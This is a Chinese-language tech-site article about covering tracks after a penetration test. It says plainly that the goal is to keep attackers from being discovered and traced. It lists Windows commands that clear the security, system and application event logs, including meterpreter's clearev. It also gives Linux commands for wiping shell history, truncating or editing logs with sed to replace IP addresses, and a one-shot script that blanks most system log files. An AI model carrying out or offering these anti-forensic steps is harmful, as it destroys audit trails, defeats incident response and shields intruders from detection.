后渗透阶段清理痕迹的方法步骤
发表于:2024-11-11 作者:千家信息网编辑
千家信息网最后更新 2024年11月11日,这篇文章主要介绍"后渗透阶段清理痕迹的方法步骤",在日常操作中,相信很多人在后渗透阶段清理痕迹的方法步骤问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答"后渗透阶段清理痕迹
千家信息网最后更新 2024年11月11日后渗透阶段清理痕迹的方法步骤
这篇文章主要介绍"后渗透阶段清理痕迹的方法步骤",在日常操作中,相信很多人在后渗透阶段清理痕迹的方法步骤问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答"后渗透阶段清理痕迹的方法步骤"的疑惑有所帮助!接下来,请跟着小编一起来学习吧!
一、前言
在渗透完成之后,为了减少被发现和追溯的概率,攻击者有必要清除自己的攻击痕迹,本文分别对windows和linux上清理痕迹的方式做一个总结。
二、windows
有远程桌面权限时手动删除日志:
开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志
wevtutil:
wevtutil el 列出系统中所有日志名称wevtutil cl system 清理系统日志wevtutil cl application 清理应用程序日志wevtutil cl security 清理安全日志
meterperter自带清除日志功能:
clearev 清除windows中的应用程序日志、系统日志、安全日志
清除recent:
在文件资源管理器中点击"查看"->"选项"->在常规->隐私中点击"清除"按钮或直接打开C:\Users\Administrator\Recent并删除所有内容或在命令行中输入del /f /s /q "%userprofile%\Recent*.*
三、linux
清除命令历史记录
histroy -r #删除当前会话历史记录history -c #删除内存中的所有命令历史rm .bash_history #删除历史文件中的内容HISTZISE=0 #通过设置历史命令条数来清除所有历史记录在隐蔽的位置执行命令使用vim打开文件执行命令:set history=0:!command
linux日志文件
/var/run/utmp 记录现在登入的用户/var/log/wtmp 记录用户所有的登入和登出/var/log/lastlog 记录每一个用户最后登入时间/var/log/btmp 记录错误的登入尝试/var/log/auth.log 需要身份确认的操作/var/log/secure 记录安全相关的日志信息/var/log/maillog 记录邮件相关的日志信息/var/log/message 记录系统启动后的信息和错误日志/var/log/cron 记录定时任务相关的日志信息/var/log/spooler 记录UUCP和news设备相关的日志信息/var/log/boot.log 记录守护进程启动和停止相关的日志消息
完全删除日志文件:
cat /dev/null > filename: > filename> filenameecho "" > filenameecho > filename
针对性删除日志文件:
删除当天日志sed -i '/当天日期/'d filename
篡改日志文件:
将所有172.16.13.1 ,ip替换为127.0.0.1sed -i 's/170.170.64.17/127.0.0.1/g'
一键清除脚本:
#!/usr/bin/bashecho > /var/log/syslogecho > /var/log/messagesecho > /var/log/httpd/access_logecho > /var/log/httpd/error_logecho > /var/log/xferlogecho > /var/log/secureecho > /var/log/auth.logecho > /var/log/user.logecho > /var/log/wtmpecho > /var/log/lastlogecho > /var/log/btmpecho > /var/run/utmprm ~/./bash_historyhistory -c
到此,关于"后渗透阶段清理痕迹的方法步骤"的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注网站,小编会继续努力为大家带来更多实用的文章!
日志
文件
痕迹
历史
命令
方法
信息
系统
步骤
阶段
学习
安全
用户
程序
管理
内容
工具
应用程序
更多
错误
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
我国网络安全保护的方针是
守望先锋打着打着服务器
1)数据库安全性的定义
麒麟v10服务器系统默认密码
跃研考研网-院校数据库
服务器asp搭建环境
男孩子学计算机网络技术
asp 数据库循环
怀旧服私营化服务器
山东农副互联网科技有限公司
内蒙古诚信网络技术服务商家
高校网络安全总结报告范文
网络安全架构的分类
青岛骏驰伟业互联网科技发展
千千画网络安全手抄报的教程
18网络安全主题班会
英国软件开发的成本
最流行的web服务器
阿里实时数据库
泰安织梦怎么查看数据库前缀
乐山市网络安全运营中心招标文件
虚拟主机独立数据库
创建云服务器时
安全数据库管理系统论文
酷聊软件开发
软件测试数据库相关的面试题
增加网络安全隐患
公主连结 数据库
软件开发人员级别评定
英国软件开发的成本